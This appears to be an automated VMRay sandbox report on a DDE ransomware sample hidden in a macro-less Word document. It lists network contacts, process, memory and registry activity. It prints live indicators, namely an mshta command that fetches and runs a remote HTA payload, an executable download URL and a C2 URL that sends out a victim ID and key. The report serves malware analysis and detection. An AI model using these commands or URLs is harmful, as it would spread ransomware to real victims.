DDE Ransomware in a Macro-less Word document | Grouped Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02 |
|
Unknown
|
| w-szczecin.pl/img2/s50.exe |
|
Unknown
|
| beer-ranking.pl/gen/ |
|
Unknown
|
| beer-ranking.pl/save.txt |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| w-szczecin.pl | 91.231.140.161 | PL | HTTP, DNS, TCP |
|
|
| v4.ident.me | 176.58.123.25 | GB | London | DNS, TCP |
|
| beer-ranking.pl | 82.221.129.19 | IS | HTTP, DNS, TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files (x86)\microsoft office\office12\winword.exe |
| Command Line | "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:21, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:14 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8d4 |
| Parent PID | 0x464 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
968
0x
964
0x
95C
0x
954
0x
950
0x
8E8
0x
8D8
0x
0
0x
984
0x
988
0x
98C
0x
AEC
0x
B98
0x
B9C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00022fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00032fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0013afff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00142fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00153fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001c7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory |
|
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory |
|
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000420000 | 0x00420000 | 0x00420fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d6fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x004f0fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000760000 | 0x00760000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00a00fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a10fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a30000 | 0x00a30000 | 0x00a3ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| office.odf | 0x01e40000 | 0x02079fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000002080000 | 0x02080000 | 0x0215efff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02160000 | 0x0242efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002430000 | 0x02430000 | 0x0243ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002440000 | 0x02440000 | 0x0244ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002450000 | 0x02450000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002460000 | 0x02460000 | 0x0246ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002470000 | 0x02470000 | 0x0247ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002480000 | 0x02480000 | 0x024bffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000024c0000 | 0x024c0000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024d0000 | 0x024d0000 | 0x0250ffff | Private Memory | Readable, Writable |
|
|
|
|
| staticcache.dat | 0x02510000 | 0x02e3ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002e40000 | 0x02e40000 | 0x02ebffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002ec0000 | 0x02ec0000 | 0x02ec1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02edffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002ee0000 | 0x02ee0000 | 0x02ee0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ef0000 | 0x02ef0000 | 0x02f2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002f30000 | 0x02f30000 | 0x02f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002f40000 | 0x02f40000 | 0x02f4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002f50000 | 0x02f50000 | 0x0304ffff | Private Memory | Readable, Writable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db | 0x03050000 | 0x03072fff | Memory Mapped File | Readable |
|
|
|
|
| msxml5r.dll | 0x03080000 | 0x03096fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000030a0000 | 0x030a0000 | 0x030affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000030b0000 | 0x030b0000 | 0x030bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000030c0000 | 0x030c0000 | 0x030fffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000003100000 | 0x03100000 | 0x034f2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000003500000 | 0x03500000 | 0x0350ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003510000 | 0x03510000 | 0x0351ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003520000 | 0x03520000 | 0x0361ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003620000 | 0x03620000 | 0x0362ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003630000 | 0x03630000 | 0x0363ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003640000 | 0x03640000 | 0x0364ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003650000 | 0x03650000 | 0x0365ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003660000 | 0x03660000 | 0x0366ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003670000 | 0x03670000 | 0x0367ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003680000 | 0x03680000 | 0x036bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000036c0000 | 0x036c0000 | 0x036cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000036d0000 | 0x036d0000 | 0x036dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000036e0000 | 0x036e0000 | 0x036effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000036f0000 | 0x036f0000 | 0x036fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003700000 | 0x03700000 | 0x0370ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003710000 | 0x03710000 | 0x0371efff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003720000 | 0x03720000 | 0x03721fff | Private Memory | Readable, Writable |
|
|
|
|
| msctf.dll.mui | 0x03730000 | 0x03730fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000003740000 | 0x03740000 | 0x0374ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003750000 | 0x03750000 | 0x0378ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000003790000 | 0x03790000 | 0x03790fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000037a0000 | 0x037a0000 | 0x037c1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000037d0000 | 0x037d0000 | 0x037dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000037e0000 | 0x037e0000 | 0x0381ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003820000 | 0x03820000 | 0x0385ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003860000 | 0x03860000 | 0x03865fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003870000 | 0x03870000 | 0x038affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000038b0000 | 0x038b0000 | 0x03caffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003cb0000 | 0x03cb0000 | 0x03cb0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003cc0000 | 0x03cc0000 | 0x03cfffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x03d00000 | 0x03dbffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000003dc0000 | 0x03dc0000 | 0x03dc0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003ed0000 | 0x03ed0000 | 0x03ee5fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003ef0000 | 0x03ef0000 | 0x03f2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f30000 | 0x03f30000 | 0x03f38fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f40000 | 0x03f40000 | 0x03f4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f50000 | 0x03f50000 | 0x03f58fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f60000 | 0x03f60000 | 0x03f64fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f70000 | 0x03f70000 | 0x03f83fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003f90000 | 0x03f90000 | 0x03f9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003fa0000 | 0x03fa0000 | 0x03fa2fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003fb0000 | 0x03fb0000 | 0x03fc2fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003fd0000 | 0x03fd0000 | 0x03fdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003fe0000 | 0x03fe0000 | 0x03fe3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003ff0000 | 0x03ff0000 | 0x03ff0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004000000 | 0x04000000 | 0x04000fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000004030000 | 0x04030000 | 0x0403ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004040000 | 0x04040000 | 0x0443ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000044d0000 | 0x044d0000 | 0x0450ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004550000 | 0x04550000 | 0x0464ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004680000 | 0x04680000 | 0x0477ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004780000 | 0x04780000 | 0x04b3efff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004be0000 | 0x04be0000 | 0x04c1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004c20000 | 0x04c20000 | 0x04d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004d80000 | 0x04d80000 | 0x04e7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004e80000 | 0x04e80000 | 0x04f7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004f80000 | 0x04f80000 | 0x0507ffff | Private Memory | Readable, Writable |
|
|
|
|
| winword.exe | 0x2f740000 | 0x2f796fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x6fc80000 | 0x7065cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x70660000 | 0x70cb3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 144 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:04 |
| Information | Value |
|---|---|
| PID | 0x9c0 |
| Parent PID | 0x8d4 (c:\program files (x86)\microsoft office\office12\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9C4
0x
9C8
0x
9CC
0x
9D0
0x
9D4
0x
9D8
0x
9DC
0x
9E4
0x
9E8
0x
9EC
0x
A20
0x
A24
0x
AE0
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\index[1].hta | 3.36 KB (3444 bytes) |
MD5:
bf7cd7cbe3aa1d0e65fd3731c9afb5c1
SHA1: 0c8d82f7e56e124445ee1167383b82b58b27b0d2 SHA256: 2b4f25a9a6df541fcea90576a08000362714744936c5fe1892ba843ff8171c49 |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50D5107A-D278-4871-8989-F4CEAAF59CFC | 08C0E040-62D1-11D1-9326-0060B067B86E | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Create | F414C260-6AC0-11CF-B6D1-00AA00BBBB58 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 00000323-0000-0000-C000-000000000046 | 00000146-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | wscrIPt.sHELl | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Open Mapping | #MSHTML#PERF#000009C0 | desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
6 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
8 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
8 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
6 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
2 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
2 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | ||
